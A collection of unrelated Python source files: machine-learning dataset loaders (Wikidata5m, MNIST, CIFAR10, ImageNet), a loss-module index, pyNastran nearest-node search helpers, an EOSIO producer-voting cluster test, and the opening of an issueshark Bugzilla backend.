"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/test.txt"
}
)
class Wikidata5m(Dataset):
"""
Wikidata5m knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(Wikidata5m, self).__init__(
"wikidata5m",
urls={
"train": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"valid": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"test": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"entity": "https://www.dropbox.com/s/bgmgvk8brjwpc9w/entity.txt.gz?dl=1",
"relation": "https://www.dropbox.com/s/37jxki93gguv0pp/relation.txt.gz?dl=1",
"alias2entity": [], # depends on `entity`
"alias2relation": [] # depends on `relation`
}
)
def train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("valid.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("train.txt")] + "valid.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def load_alias(self, alias_file):
alias2object = {}
ambiguous = set()
with open(alias_file, "r") as fin:
for line in fin:
tokens = line.strip().split("\t")
object = tokens[0]
for alias in tokens[1:]:
if alias in alias2object and alias2object[alias] != object:
ambiguous.add(alias)
alias2object[alias] = object
for alias in ambiguous:
alias2object.pop(alias)
return alias2object
def alias2entity_preprocess(self, save_file):
return self.load_alias(self.entity)
def alias2relation_preprocess(self, save_file):
return self.load_alias(self.relation)
class Freebase(Dataset):
"""
Freebase knowledge graph dataset.
Splits:
train
"""
def __init__(self):
super(Freebase, self).__init__(
"freebase",
urls={
"train": "http://commondatastorage.googleapis.com/freebase-public/rdf/freebase-rdf-latest.gz"
}
)
class MNIST(Dataset):
"""
MNIST dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(MNIST, self).__init__(
"mnist",
urls={
"train_image_data": "http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz",
"train_label_data": "http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz",
"test_image_data": "http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz",
"test_label_data": "http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
}
)
def train_image_data_preprocess(self, raw_file, save_file):
images = np.fromfile(raw_file, dtype=np.uint8)
return images[16:].reshape(-1, 28*28)
def train_label_data_preprocess(self, raw_file, save_file):
labels = np.fromfile(raw_file, dtype=np.uint8)
return labels[8:]
test_image_data_preprocess = train_image_data_preprocess
test_label_data_preprocess = train_label_data_preprocess
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
class CIFAR10(Dataset):
"""
CIFAR10 dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(CIFAR10, self).__init__(
"cifar10",
urls={
"train_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"train_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
},
)
def load_images(self, *batch_files):
images = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
images.append(batch[:, 1:])
return np.concatenate(images)
def load_labels(self, meta_file, *batch_files):
classes = []
with open(meta_file, "r") as fin:
for line in fin:
line = line.strip()
if line:
classes.append(line)
classes = np.asarray(classes)
labels = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
labels.append(batch[:, 0])
return classes[np.concatenate(labels)]
def train_image_data_preprocess(self, raw_path, save_file):
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_images(*batch_files)
def train_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_labels(meta_file, *batch_files)
def test_image_data_preprocess(self, raw_path, save_file):
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_images(batch_file)
def test_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_labels(meta_file, batch_file)
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
class ImageNet(Dataset):
"""
ImageNet dataset for visualization.
Splits:
train_image, train_feature_data, train_label, train_hierarchical_label,
valid_image, valid_feature_data, valid_label, valid_hierarchical_label
"""
def __init__(self):
super(ImageNet, self).__init__(
"imagenet",
urls={
"train_image": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_train.tar",
"train_feature_data": [], # depends on `train_image`
"train_label": [], # depends on `train_image`
"train_hierarchical_label": [], # depends on `train_image`
"valid_image": ["http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_val.tar",
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz"],
"valid_feature_data": [], # depends on `valid_image`
"valid_label": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"valid_hierarchical_label":
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"feature_data": [], # depends on `train_feature_data` & `valid_feature_data`
"label": [], # depends on `train_label` & `valid_label`
"hierarchical_label": [], # depends on `train_hierarchical_label` & `valid_hierarchical_label`
}
)
def import_wordnet(self):
import nltk
try:
nltk.data.find("corpora/wordnet")
except LookupError:
nltk.download("wordnet")
from nltk.corpus import wordnet
try:
wordnet.synset_from_pos_and_offset
except AttributeError:
wordnet.synset_from_pos_and_offset = wordnet._synset_from_pos_and_offset
return wordnet
def get_name(self, synset):
name = synset.name()
return name[:name.find(".")]
def readable_label(self, labels, save_file, hierarchy=False):
wordnet = self.import_wordnet()
if hierarchy:
logger.info("generating human-readable hierarchical labels")
else:
logger.info("generating human-readable labels")
synsets = []
for label in labels:
pos = label[0]
offset = int(label[1:])
synset = wordnet.synset_from_pos_and_offset(pos, offset)
synsets.append(synset)
depth = max([synset.max_depth() for synset in synsets])
num_sample = len(synsets)
labels = [self.get_name(synset) for synset in synsets]
num_class = len(set(labels))
hierarchies = [labels]
while hierarchy and num_class > 1:
depth -= 1
for i in range(num_sample):
if synsets[i].max_depth() > depth:
# only takes the first recall
synsets[i] = synsets[i].hypernyms()[0]
labels = [self.get_name(synset) for synset in synsets]
hierarchies.append(labels)
num_class = len(set(labels))
hierarchies = hierarchies[::-1]
with open(save_file, "w") as fout:
for hierarchy in zip(*hierarchies):
fout.write("%s\n" % "\t".join(hierarchy))
def image_feature_data(self, image_path):
""""""
import torchvision
from torchvision import transforms
augmentation = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = torchvision.datasets.ImageFolder(image_path, augmentation)
features = super(self, ImageNet).image_feature_data(dataset)
return features
def train_image_preprocess(self, image_path, save_file):
tar_files = glob.glob(os.path.join(image_path, "*.tar"))
if len(tar_files) == 0:
return image_path
for tar_file in tar_files:
self.extract(tar_file)
os.remove(tar_file)
return image_path
def train_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.train_image)
np.save(numpy_file, features)
return features
def train_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def train_hierarchical_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def valid_image_preprocess(self, image_path, meta_path, save_file):
from scipy.io import loadmat
image_files = glob.glob(os.path.join(image_path, "*.JPEG"))
if len(image_files) == 0:
return image_path
logger.info("re-arranging images into sub-folders")
image_files = sorted(image_files)
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file)
labels = [id2class[id] for id in ids]
for image_file, label in zip(image_files, labels):
class_path = os.path.join(image_path, label)
if not os.path.exists(class_path):
os.mkdir(class_path)
shutil.move(image_file, class_path)
return image_path
def valid_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.valid_image)
np.save(numpy_file, features)
return features
def valid_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def valid_hierarchical_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def feature_data_preprocess(self, save_file):
return np.concatenate([self.train_feature_data, self.valid_feature_data])
def label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(save_file, "a") as fout:
with open(self.valid_label, "r") as fin:
shutil.copyfileobj(fin, fout)
def hierarchical_label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(self.valid_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
blogcatalog = BlogCatalog()
youtube = Youtube()
flickr = Flickr()
hyperlink2012 = Hyperlink2012()
friendster = Friendster()
wikipedia = Wikipedia()
math = Math()
fb15k = FB15k()
fb15k237 = FB15k237()
wn18 = WN18()
wn18rr = WN18RR()
wikidata5m = Wikidata5m()
freebase = Freebase()
mnist = MNIST()
cifar10 = CIFAR10()
imagenet = ImageNet()
__all__ = [
"Dataset",
"BlogCatalog", "Youtube", "Flickr", "Hyperlink2012", "Friendster", "Wikipedia",
"Math", "FB15k", "FB15k237", "WN18", "WN18RR", "Wikidata5m", "Freebase",
"MNIST", "CIFAR10", "ImageNet"
] |
py | 1a32f5484006bad6e61c4b7f46ef1fca3775a43b | from .accuracy import Accuracy, accuracy
from .balanced_l1_loss import BalancedL1Loss, balanced_l1_loss
from .cross_entropy_loss import (CrossEntropyLoss, binary_cross_entropy,
cross_entropy, mask_cross_entropy)
from .focal_loss import FocalLoss, sigmoid_focal_loss
from .ghm_loss import GHMC, GHMR
from .iou_loss import (BoundedIoULoss, GIoULoss, IoULoss, bounded_iou_loss,
iou_loss)
from .mse_loss import MSELoss, mse_loss
from .smooth_l1_loss import SmoothL1Loss, smooth_l1_loss
from .utils import reduce_loss, weight_reduce_loss, weighted_loss
from .supervised_contrastive_loss import (SupContrastLoss, SupContrastNegLoss,
CurContrastLoss, CurContrastNegLoss)
from .angular_margin_loss import (ArcFaceLoss, ArcFaceFocalLoss,
CurricularLoss, FocalCurricularLoss)
__all__ = [
'accuracy', 'Accuracy', 'cross_entropy', 'binary_cross_entropy',
'mask_cross_entropy', 'CrossEntropyLoss', 'sigmoid_focal_loss',
'FocalLoss', 'smooth_l1_loss', 'SmoothL1Loss', 'balanced_l1_loss',
'BalancedL1Loss', 'mse_loss', 'MSELoss', 'iou_loss', 'bounded_iou_loss',
'IoULoss', 'BoundedIoULoss', 'GIoULoss', 'GHMC', 'GHMR', 'reduce_loss',
'weight_reduce_loss', 'weighted_loss', 'SupContrastLoss',
'SupContrastNegLoss', 'CurContrastLoss', 'CurContrastNegLoss',
'ArcFaceLoss', 'ArcFaceFocalLoss', 'CurricularLoss', 'FocalCurricularLoss',
]
|
py | 1a32f7003e0ee0d2444b96b1522dd9b6b3e41910 | """
defines:
* nids_close = find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max, tol)
* ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
"""
from itertools import count
from typing import List, Optional
import numpy as np
from pyNastran.bdf.mesh_utils.bdf_equivalence import (
_get_tree)
def find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max=1, tol=None, msg=''):
# type: (np.ndarray, np.ndarray, np.ndarray, int, Optional[float], str) -> np.ndarray
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points (e.g., xyz_cid0)
nids : (Nnodes, ) int ndarray
the source node ids (e.g.; nid_cp_cid[:, 0])
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to; xyz_to_find
tol : float; default=None
the max spherical tolerance
None : the whole model
neq_max : int; default=1.0
the number of "close" points
msg : str; default=''
custom message used for errors
Returns
-------
nids_close: (Ncompare, ) int ndarray
the close node ids
"""
if not isinstance(neq_max, int):
msgi = 'neq_max=%r must be an int; type=%s\n%s' % (
neq_max, type(neq_max), msg)
raise TypeError(msgi)
#ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
if tol is None:
xyz_max = nodes_xyz.max(axis=0)
xyz_min = nodes_xyz.min(axis=0)
assert len(xyz_max) == 3, xyz_max
dxyz = np.linalg.norm(xyz_max - xyz_min)
tol = 2. * dxyz
ieq = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1]
ncompare = xyz_compare.shape[0]
assert len(ieq) == ncompare, 'increase the tolerance so you can find nodes; tol=%r' % tol
try:
nids_out = nids[ieq]
except IndexError:
# if you get a crash while trying to create the error message
# check to see if your nodes are really far from each other
#
nnids = len(nids)
msgi = 'Cannot find:\n'
for i, ieqi, nid in zip(count(), ieq, nids):
if ieqi == nnids:
xyz = xyz_compare[i, :]
msgi += ' nid=%s xyz=%s\n' % (nid, xyz)
msgi += msg
raise IndexError(msgi)
return nids_out
def find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol, msg=''):
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
neq_max : int
the number of "close" points (default=4)
tol : float
the max spherical tolerance
msg : str; default=''
error message
Returns
-------
slots : (Ncompare, ) int ndarray
the indices of the close nodes corresponding to nodes_xyz
"""
#nodes_xyz, model, nids, inew = _eq_nodes_setup(
#bdf_filename, tol, renumber_nodes=renumber_nodes,
#xref=xref, node_set=node_set, debug=debug)
ieq, slots = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1:3]
return ieq
def _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol, neq_max=4, msg=''):
# type: (np.ndarray, np.ndarray, float, int, str) -> (Any, np.ndarray, np.ndarray)
"""
helper function for `bdf_equivalence_nodes`
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
tol : float
the max spherical tolerance
neq_max : int; default=4
the number of close nodes
msg : str; default=''
error message
Returns
-------
kdt : cKDTree()
the kdtree object
ieq : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
slots : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
msg : str; default=''
error message
"""
assert isinstance(xyz_compare, np.ndarray), type(xyz_compare)
if nodes_xyz.shape[1] != xyz_compare.shape[1]:
msgi = 'nodes_xyz.shape=%s xyz_compare.shape=%s%s' % (
str(nodes_xyz.shape), str(xyz_compare.shape), msg)
raise RuntimeError(msgi)
kdt = _get_tree(nodes_xyz, msg=msg)
# check the closest 10 nodes for equality
deq, ieq = kdt.query(xyz_compare, k=neq_max, distance_upper_bound=tol)
#print(deq)
#print('ieq =', ieq)
#print('neq_max = %s' % neq_max)
# get the ids of the duplicate nodes
nnodes = nodes_xyz.shape[0]
if neq_max == 1:
assert len(deq.shape) == 1, deq.shape
slots = np.where(ieq < nnodes)
else:
assert len(deq.shape) == 2, deq.shape
slots = np.where(ieq[:, :] < nnodes)
#print('slots =', slots)
return kdt, ieq, slots
|
py | 1a32f710f4dbcc5dcc80b60e1ab5d7d37f944250 | #!/usr/bin/env python3
from testUtils import Utils
import testUtils
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import Node
from TestHelper import TestHelper
import decimal
import math
import re
import time
###############################################################
# nodeos_voting_test
# --dump-error-details <Upon error print etc/eosio/node_*/config.ini and var/lib/node_*/stderr.log to stdout>
# --keep-logs <Don't delete var/lib/node_* folders upon test completion>
###############################################################
class ProducerToNode:
map={}
@staticmethod
def populate(node, num):
for prod in node.producers:
ProducerToNode.map[prod]=num
Utils.Print("Producer=%s for nodeNum=%s" % (prod,num))
def isValidBlockProducer(prodsActive, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
return False
return prodsActive[blockProducer]
def validBlockProducer(prodsActive, prodsSeen, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
Utils.cmdError("unexpected block producer %s at blockNum=%s" % (blockProducer,blockNum))
Utils.errorExit("Failed because of invalid block producer")
if not prodsActive[blockProducer]:
Utils.cmdError("block producer %s for blockNum=%s not elected, belongs to node %s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
Utils.errorExit("Failed because of incorrect block producer")
prodsSeen[blockProducer]=True
def setActiveProducers(prodsActive, activeProducers):
for prod in prodsActive:
prodsActive[prod]=prod in activeProducers
def verifyProductionRounds(trans, node, prodsActive, rounds):
blockNum=node.getNextCleanProductionCycle(trans)
Utils.Print("Validating blockNum=%s" % (blockNum))
temp=Utils.Debug
Utils.Debug=False
Utils.Print("FIND VALID BLOCK PRODUCER")
blockProducer=node.getBlockProducerByNum(blockNum)
lastBlockProducer=blockProducer
adjust=False
while not isValidBlockProducer(prodsActive, blockNum, node):
adjust=True
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
Utils.Print("blockProducer=%s for blockNum=%s is for node=%s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
lastBlockProducer=blockProducer
blockNum+=1
Utils.Print("VALID BLOCK PRODUCER")
saw=0
sawHigh=0
startingFrom=blockNum
doPrint=0
invalidCount=0
while adjust:
invalidCount+=1
if lastBlockProducer==blockProducer:
saw+=1;
else:
if saw>=12:
startingFrom=blockNum
if saw>12:
Utils.Print("ERROR!!!!!!!!!!!!!! saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
break
else:
if saw > sawHigh:
sawHigh = saw
Utils.Print("sawHigh=%s" % (sawHigh))
if doPrint < 5:
doPrint+=1
Utils.Print("saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
lastBlockProducer=blockProducer
saw=1
blockProducer=node.getBlockProducerByNum(blockNum)
blockNum+=1
if adjust:
blockNum-=1
Utils.Print("ADJUSTED %s blocks" % (invalidCount-1))
prodsSeen=None
Utils.Print("Verify %s complete rounds of all producers producing" % (rounds))
for i in range(0, rounds):
prodsSeen={}
lastBlockProducer=None
for j in range(0, 21):
# each new set of 12 blocks should have a different blockProducer
if lastBlockProducer is not None and lastBlockProducer==node.getBlockProducerByNum(blockNum):
Utils.cmdError("expected blockNum %s to be produced by any of the valid producers except %s" % (blockNum, lastBlockProducer))
Utils.errorExit("Failed because of incorrect block producer order")
# make sure that the next set of 12 blocks all have the same blockProducer
lastBlockProducer=node.getBlockProducerByNum(blockNum)
for k in range(0, 12):
validBlockProducer(prodsActive, prodsSeen, blockNum, node1)
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
printStr=""
newBlockNum=blockNum-18
for l in range(0,36):
printStr+="%s" % (newBlockNum)
printStr+=":"
newBlockProducer=node.getBlockProducerByNum(newBlockNum)
printStr+="%s" % (newBlockProducer)
printStr+=" "
newBlockNum+=1
Utils.cmdError("expected blockNum %s (started from %s) to be produced by %s, but produded by %s: round=%s, prod slot=%s, prod num=%s - %s" % (blockNum, startingFrom, lastBlockProducer, blockProducer, i, j, k, printStr))
Utils.errorExit("Failed because of incorrect block producer order")
blockNum+=1
# make sure that we have seen all 21 producers
prodsSeenKeys=prodsSeen.keys()
if len(prodsSeenKeys)!=21:
Utils.cmdError("only saw %s producers of expected 21. At blockNum %s only the following producers were seen: %s" % (len(prodsSeenKeys), blockNum, ",".join(prodsSeenKeys)))
Utils.errorExit("Failed because of missing block producers")
Utils.Debug=temp
Print=Utils.Print
errorExit=Utils.errorExit
from core_symbol import CORE_SYMBOL
args = TestHelper.parse_args({"--prod-count","--dump-error-details","--keep-logs","-v","--leave-running","--clean-run",
"--p2p-plugin","--wallet-port"})
Utils.Debug=args.v
totalNodes=4
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=args.prod_count
killAll=args.clean_run
p2pPlugin=args.p2p_plugin
walletPort=args.wallet_port
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="cleos"
try:
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
time.sleep(5)
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=totalNodes, totalNodes=totalNodes, totalProducers=totalNodes*21, p2pPlugin=p2pPlugin, useBiosBootFile=False) is False:
Utils.cmdError("launcher")
Utils.errorExit("Failed to stand up eos cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
accounts=cluster.createAccountKeys(5)
if accounts is None:
Utils.errorExit("FAILURE - create keys")
accounts[0].name="tester111111"
accounts[1].name="tester222222"
accounts[2].name="tester333333"
accounts[3].name="tester444444"
accounts[4].name="tester555555"
testWalletName="test"
Print("Creating wallet \"%s\"." % (testWalletName))
testWallet=walletMgr.create(testWalletName, [cluster.eosioAccount,accounts[0],accounts[1],accounts[2],accounts[3],accounts[4]])
for _, account in cluster.defProducerAccounts.items():
walletMgr.importKey(account, testWallet, ignoreDupKeyWarning=True)
Print("Wallet \"%s\" password=%s." % (testWalletName, testWallet.password.encode("utf-8")))
for i in range(0, totalNodes):
node=cluster.getNode(i)
node.producers=Cluster.parseProducers(i)
for prod in node.producers:
trans=node.regproducer(cluster.defProducerAccounts[prod], "http::/mysite.com", 0, waitForTransBlock=False, exitOnError=True)
node0=cluster.getNode(0)
node1=cluster.getNode(1)
node2=cluster.getNode(2)
node3=cluster.getNode(3)
node=node0
# create accounts via eosio as otherwise a bid is needed
for account in accounts:
Print("Create new account %s via %s" % (account.name, cluster.eosioAccount.name))
trans=node.createInitializeAccount(account, cluster.eosioAccount, stakedDeposit=0, waitForTransBlock=False, stakeNet=1000, stakeCPU=1000, buyRAM=1000, exitOnError=True)
transferAmount="100000000.0000 {0}".format(CORE_SYMBOL)
Print("Transfer funds %s from account %s to %s" % (transferAmount, cluster.eosioAccount.name, account.name))
node.transferFunds(cluster.eosioAccount, account, transferAmount, "test transfer")
trans=node.delegatebw(account, 20000000.0000, 20000000.0000, waitForTransBlock=True, exitOnError=True)
# containers for tracking producers
prodsActive={}
for i in range(0, 4):
node=cluster.getNode(i)
ProducerToNode.populate(node, i)
for prod in node.producers:
prodsActive[prod]=False
#first account will vote for node0 producers, all others will vote for node1 producers
node=node0
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node1
setActiveProducers(prodsActive, node1.producers)
verifyProductionRounds(trans, node2, prodsActive, 2)
# test shifting all 21 away from one node to another
# first account will vote for node2 producers, all others will vote for node3 producers
node1
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node2
setActiveProducers(prodsActive, node2.producers)
verifyProductionRounds(trans, node1, prodsActive, 2)
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful, killEosInstances, killWallet, keepLogs, killAll, dumpErrorDetails)
exit(0)
|
py | 1a32f76ece3c6fc9a90629e8e53469b4d7c989a7 | import sys
import dateutil.parser
from mongoengine import DoesNotExist
import copy
from issueshark.backends.basebackend import BaseBackend
from issueshark.backends.helpers.bugzillaagent import BugzillaAgent
from validate_email import validate_email
import logging
from pycoshark.mongomodels import Issue, People, Event, IssueComment
logger = logging.getLogger('backend')
class BugzillaBackend(BaseBackend):
"""
Backend that collects data from a Bugzilla REST API
"""
@property
def identifier(self):
"""
Identifier (bugzilla)
"""
return 'bugzillaOld'
def __init__(self, cfg, issue_system_id, project_id):
"""
Initialization
Initializes the people dictionary see: :func:`~issueshark.backends.bugzilla.BugzillaBackend._get_people`
Initializes the attribute mapping: Maps attributes from the bugzilla API to our database design
:param cfg: holds als configuration. Object of class :class:`~issueshark.config.Config`
:param issue_system_id: id of the issue system for which data should be collected. :class:`bson.objectid.ObjectId`
:param project_id: id of the project to which the issue system belongs. :class:`bson.objectid.ObjectId`
"""
super().__init__(cfg, issue_system_id, project_id)
logger.setLevel(self.debug_level)
self.bugzilla_agent = None
self.people = {}
self.at_mapping = {
'assigned_to_detail': 'assignee_id',
'blocks': 'issue_links',
'component': 'components',
'creation_time': 'created_at',
'creator_detail': 'creator_id',
'depends_on': 'issue_links',
'dupe_of': 'issue_links',
'keywords': 'labels',
'last_change_time': 'updated_at',
'op_sys': 'environment',
'platform': 'platform',
'resolution': 'resolution',
'severity': 'priority',
'status': 'status',
'summary': 'title',
'target_milestone': 'fix_versions',
'version': 'affects_versions'
}
def process(self):
"""
Gets all the issues and their updates
1. Gets the last stored issues updated_at field
2. Gets all issues that was last change since this value
3. Processes the results in 50-steps
4. For each issue calls: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_issue`
"""
self.bugzilla_agent = BugzillaAgent(logger, self.config)
# Get last modification date (since then, we will collect bugs)
last_issue = Issue.objects(issue_system_id=self.issue_system_id).order_by('-updated_at')\
.only('updated_at').first()
starting_date = None
if last_issue is not None:
starting_date = last_issue.updated_at
# Get all issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50)
# If no new bugs found, return
if len(issues) == 0:
logger.info('No new issues found. Exiting...')
sys.exit(0)
# Otherwise, go through all issues
processed_results = 50
while len(issues) > 0:
logger.info("Processing %d issues..." % len(issues))
for issue in issues:
logger.info("Processing issue %s" % issue['id'])
self._process_issue(issue)
# Go through the next issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50, offset=processed_results)
processed_results += 50
def _process_issue(self, issue):
"""
Processes the issue in several steps:
1. Get all comments. See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_comments`
2. Get the whole issue history.\
See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_issue_history`
3. Transforms the issue to our issue model. \
See: :func:`issueshark.backends.bugzilla.BugzillaBackend._transform_issue`
4. Go through the history of the issue (newest to oldes) and set back the issue step by step. During this \
